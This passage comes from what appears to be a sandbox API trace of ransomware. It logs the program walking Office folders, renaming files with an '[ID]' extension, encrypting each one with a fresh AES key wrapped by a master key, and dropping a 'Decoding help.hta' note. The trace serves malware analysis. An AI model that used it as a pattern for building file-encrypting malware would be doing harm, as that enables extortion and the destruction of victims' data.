Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\", lpString2="Office32WW.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" [0041.989] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" [0041.989] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0041.989] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.990] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x29c [0041.990] CreateFileMappingA (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4a8 [0041.990] CryptAcquireContextA (in: phProv=0xc7cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xc7cfcec*=0x3448610) returned 1 [0045.204] CryptGenKey (in: hProv=0x3448610, Algid=0x6610, dwFlags=0x1, phKey=0xc7cfce8 | out: phKey=0xc7cfce8*=0x5a54b0) returned 1 [0045.204] CryptExportKey (in: hKey=0x5a54b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xc7cfbe4, pdwDataLen=0xc7cfce4 | out: pbData=0xc7cfbe4*, pdwDataLen=0xc7cfce4*=0x2c) returned 1 [0045.204] MapViewOfFile (hFileMappingObject=0x4a8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x6250000 [0045.220] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xc7cfbe4*, pdwDataLen=0xc7cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xc7cfbe4*, pdwDataLen=0xc7cfcf8*=0x100) returned 1 [0045.220] CryptEncrypt (in: hKey=0x5a54b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6250000, pdwDataLen=0xc7cfce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x6250000*, pdwDataLen=0xc7cfce4*=0x100000) returned 1 [0046.735] UnmapViewOfFile (lpBaseAddress=0x6250000) returned 1 [0046.748] CloseHandle (hObject=0x4a8) returned 1 [0046.748] CryptDestroyKey (hKey=0x5a54b0) returned 1 [0046.748] CryptReleaseContext (hProv=0x3448610, dwFlags=0x0) returned 1 [0046.748] SetFilePointerEx (in: hFile=0x29c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.748] WriteFile (in: hFile=0x29c, lpBuffer=0xc7cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xc7cfcf8, lpOverlapped=0x0 | out: lpBuffer=0xc7cfbe4*, lpNumberOfBytesWritten=0xc7cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.851] WriteFile (in: hFile=0x29c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xc7cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xc7cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.851] CloseHandle (hObject=0x29c) returned 1 [0049.397] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0051.358] FindNextFileW (in: hFindFile=0x5a5cb0, lpFindFileData=0xc7cfd30 | out: lpFindFileData=0xc7cfd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x16771fb0, ftCreationTime.dwHighDateTime=0x1cb12b4, ftLastAccessTime.dwLowDateTime=0x16771fb0, ftLastAccessTime.dwHighDateTime=0x1cb12b4, ftLastWriteTime.dwLowDateTime=0x46536400, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0051.359] lstrcpyW (in: lpString1=0x11173bc8, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*" [0051.359] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*") returned 70 [0051.359] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Decoding help.hta" [0051.359] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0051.359] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Office32WW.xml") returned -1 [0051.359] lstrlenW (lpString="Office32WW.xml") returned 14 [0051.359] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*" [0051.359] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*") returned 70 [0051.359] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\", lpString2="Office32WW.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" [0051.359] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" [0051.359] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0051.359] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0055.268] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0055.269] CreateFileMappingA (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x738 [0055.269] CryptAcquireContextA (in: phProv=0xc7cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xc7cfcec*=0x34499b8) returned 1 [0055.834] CryptGenKey (in: hProv=0x34499b8, Algid=0x6610, dwFlags=0x1, phKey=0xc7cfce8 | out: phKey=0xc7cfce8*=0x5e2d70) returned 1 [0055.834] CryptExportKey (in: hKey=0x5e2d70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xc7cfbe4, pdwDataLen=0xc7cfce4 | out: pbData=0xc7cfbe4*, pdwDataLen=0xc7cfce4*=0x2c) returned 1 [0055.834] MapViewOfFile (hFileMappingObject=0x738, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10a0) returned 0x2d0000 [0055.842] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xc7cfbe4*, pdwDataLen=0xc7cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xc7cfbe4*, pdwDataLen=0xc7cfcf8*=0x100) returned 1 [0055.842] CryptEncrypt (in: hKey=0x5e2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000, pdwDataLen=0xc7cfce4*=0x10a0, dwBufLen=0x10a0 | out: pbData=0x2d0000*, pdwDataLen=0xc7cfce4*=0x10a0) returned 1 [0055.842] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0055.845] CloseHandle (hObject=0x738) returned 1 [0055.845] CryptDestroyKey (hKey=0x5e2d70) returned 1 [0055.845] CryptReleaseContext (hProv=0x34499b8, dwFlags=0x0) returned 1 [0055.845] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0055.845] WriteFile (in: hFile=0x128, lpBuffer=0xc7cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xc7cfcf8, lpOverlapped=0x0 | out: lpBuffer=0xc7cfbe4*, lpNumberOfBytesWritten=0xc7cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.220] WriteFile (in: hFile=0x128, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xc7cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xc7cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0056.221] CloseHandle (hObject=0x128) returned 1 [0056.221] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0056.221] FindNextFileW (in: hFindFile=0x5a5cb0, lpFindFileData=0xc7cfd30 | out: lpFindFileData=0xc7cfd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec54b6b0, ftCreationTime.dwHighDateTime=0x1cb04a9, ftLastAccessTime.dwLowDateTime=0xec54b6b0, ftLastAccessTime.dwHighDateTime=0x1cb04a9, ftLastWriteTime.dwLowDateTime=0x4a687710, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0x0, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0056.604] lstrcpyW (in: lpString1=0x9659e88, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*" [0056.605] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*") returned 70 [0056.605] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Decoding help.hta" [0056.605] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0056.605] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ose.exe") returned -1 [0056.605] lstrlenW (lpString="ose.exe") returned 7 [0056.605] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*" [0056.605] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*") returned 70 [0056.605] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\", lpString2="ose.exe" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" [0056.605] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" [0056.605] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0056.605] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.214] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x820 [0058.215] CreateFileMappingA (hFile=0x820, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xa28 [0058.215] CryptAcquireContextA (in: phProv=0xc7cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xc7cfcec*=0x3448478) returned 1 [0060.186] CryptGenKey (in: hProv=0x3448478, Algid=0x6610, dwFlags=0x1, phKey=0xc7cfce8 | out: phKey=0xc7cfce8*=0x42cf458) returned 1 [0060.186] CryptExportKey (in: hKey=0x42cf458, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xc7cfbe4, pdwDataLen=0xc7cfce4 | out: pbData=0xc7cfbe4*, pdwDataLen=0xc7cfce4*=0x2c) returned 1 [0060.186] MapViewOfFile (hFileMappingObject=0xa28, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2a960) returned 0x4a20000 [0063.692] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xc7cfbe4*, pdwDataLen=0xc7cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xc7cfbe4*, pdwDataLen=0xc7cfcf8*=0x100) returned 1 [0063.692] CryptEncrypt (hKey=0x42cf458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4a20000, pdwDataLen=0xc7cfce4*=0x2a960, dwBufLen=0x2a960) Thread: id = 149 os_tid = 0x7b8 [0040.229] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*", lpFindFileData=0x544fd30 | out: lpFindFileData=0x544fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5127f1f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe5cd5260, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5cd5260, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8bd0 [0042.183] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.184] FindNextFileW (in: hFindFile=0x5d8bd0, lpFindFileData=0x544fd30 | out: lpFindFileData=0x544fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5127f1f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe5cd5260, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5cd5260, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.533] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.533] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.533] FindNextFileW (in: hFindFile=0x5d8bd0, lpFindFileData=0x544fd30 | out: lpFindFileData=0x544fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f664b00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5943160, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x5f664b00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0xd0aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adjacency.thmx", cAlternateFileName="ADJACE~1.THM")) returned 1 [0042.804] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" [0042.804] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned 60 [0042.804] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Decoding help.hta" [0042.804] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\document themes 14\\decoding help.hta")) returned 0xffffffff [0042.805] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\document themes 14\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6a0 [0042.805] WriteFile (in: hFile=0x6a0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x544fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x544fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.806] CloseHandle (hObject=0x6a0) returned 1 [0042.806] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.807] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Adjacency.thmx") returned 1 [0042.807] lstrlenW (lpString="Adjacency.thmx") returned 14 [0042.807] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" [0042.807] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned 60 [0042.807] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\", lpString2="Adjacency.thmx" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Adjacency.thmx") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Adjacency.thmx" [0042.807] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Adjacency.thmx" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Adjacency.thmx") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Adjacency.thmx" [0042.807] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Adjacency.thmx", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Adjacency.thmx.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Adjacency.thmx.[ID]g9uZrLhJaygpwRm1[ID]" [0042.807] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Adjacency.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\adjacency.thmx"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Adjacency.thmx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\document themes 14\\adjacency.thmx.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.825] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Adjacency.thmx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\document themes 14\\adjacency.thmx.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6a8 [0042.825] CreateFileMappingA (hFile=0x6a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x69c [0042.825] CryptAcquireContextA (in: phProv=0x544fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x544fcec*=0x3448be8) returned 1 [0042.826] CryptGenKey (in: hProv=0x3448be8, Algid=0x6610, dwFlags=0x1, phKey=0x544fce8 | out: phKey=0x544fce8*=0x6716f0) returned 1 [0042.826] CryptExportKey (in: hKey=0x6716f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x544fbe4, pdwDataLen=0x544fce4 | out: pbData=0x544fbe4*, pdwDataLen=0x544fce4*=0x2c) returned 1 [0042.826] MapViewOfFile (hFileMappingObject=0x69c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd0a0) returned 0x8ba0000 [0042.829] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x544fbe4*, pdwDataLen=0x544fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x544fbe4*, pdwDataLen=0x544fcf8*=0x100) returned 1 [0042.829] CryptEncrypt (in: hKey=0x6716f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8ba0000, pdwDataLen=0x544fce4*=0xd0a0, dwBufLen=0xd0a0 | out: pbData=0x8ba0000*, pdwDataLen=0x544fce4*=0xd0a0) returned 1 [0042.847] UnmapViewOfFile (lpBaseAddress=0x8ba0000) returned 1 [0042.849] CloseHandle (hObject=0x69c) returned 1 [0042.849] CryptDestroyKey (hKey=0x6716f0) returned 1 [0042.849] CryptReleaseContext (hProv=0x3448be8, dwFlags=0x0) returned 1 [0042.849] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.850] WriteFile (in: hFile=0x6a8, lpBuffer=0x544fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x544fcf8, lpOverlapped=0x0 | out: lpBuffer=0x544fbe4*, lpNumberOfBytesWritten=0x544fcf8*=0x100, lpOverlapped=0x0) returned 1 [0042.850] WriteFile (in: hFile=0x6a8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x544fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x544fcf8*=0x500, lpOverlapped=0x0) returned 